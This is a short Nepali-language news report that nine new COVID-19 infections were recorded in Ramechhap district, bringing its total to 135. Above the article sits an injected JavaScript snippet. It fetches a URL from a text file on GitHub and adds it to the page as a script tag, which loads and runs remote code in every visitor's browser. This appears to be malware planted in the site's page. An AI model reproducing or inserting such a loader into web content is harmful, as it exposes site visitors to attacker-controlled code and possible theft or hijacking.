;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज ०३,
रामेछाप । रामेछाप जिल्लामा आज (शनिबार) एकैदिन ९ जना कोरोनाका संकर्मित थपिएका छन् । स्वास्थ्य तथा जनसंख्या मन्त्रालयले नियमित विज्ञप्तिमातर्फत जनाएको छ ।
योसंगै जिल्लामा कोरोना संक्रमित् हुनेको संख्या १ सय ३५ पुगेको छ । जिल्ला अस्पताल रामेछापले भने २ जना जिल्लाबाट पठाएका स्वाब पोहेटिभ भएको बताएको छ । अरु सबै काठमाडौंमा स्वाब संकलन गरि पोजेटिभ भएका हुन् । file Photo
फेसबुक प्रतिक्रियाहरु